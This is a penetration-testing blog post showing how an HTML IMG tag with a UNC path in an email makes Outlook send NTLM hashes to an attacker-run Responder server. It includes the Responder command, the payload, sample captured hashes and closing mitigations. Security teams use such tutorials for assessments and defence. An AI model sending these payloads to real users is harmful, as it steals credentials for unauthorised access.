Responder IMG SRC

Introduction

I haven’t see too many blog posts regarding this topic, but I can assure it’s not super original. However, it is extremely helpful for obtaining credentials during a pentest.

Imagine you’re trying to gain access to a client’s remote access tool (I.E. VPN, Citrix, VMWare View, etc.), but you currently don’t have any credentials. You can try you luck and see if you can snag a NTLMv1/NTLMv2 hash to crack.

Explanation

Much like using Responder in any other situation, you can use it to trick the Outlook email client to participate in a challenge-and-response. This requires SMB to be allowed on egress and the user would have to enable the showing of remote content.

Here’s a terrible graph to illustrate my point:

IMG SRC Graph

Attacker == Red Guy
Target == Blue Guy

Tools

Proof of Concept

We will want to get Responder setup on an internet-facing server.

1
$ python Responder.py --ip=54.149.221.251 --interface=eth0 --fingerprint --verbose --lm

Next, we’ll want to embed a link to our Responder server into an email.

1
<IMG SRC="\\54.149.221.251\logo.gif" ALIGN="bottom" BORDER="0">

If the target opens the email within Outlook (and provided they don’t have SMB/CIFS blocked on egress), we will get a response.

1
2
3
05/07/2017 12:24:49 PM - [SMB] NTLMv2 Client : 54.149.221.251
05/07/2017 12:24:49 PM - [SMB] NTLMv2 Username : TEST_DOMAIN\test
05/07/2017 12:24:49 PM - [SMB] NTLMv2 Hash : test::TEST_DOMAIN:9294119132765119:E5C9EB55B7336050C2202552E8872582:01010000000000009E6E35D69FC2D2017E987DD0D566E82100000000020000000000000000000000

We can then crack these captured hashes offline using your preferred wordlist/rule combinations. This should hopefully yield credentials for further activities.

Closing

Here are some solutions to this problem:

  • Block SMB/CIFS on egress.
  • Disable the automaatic downloading of external content.
  • Implement more stringent password policy and/or MFA.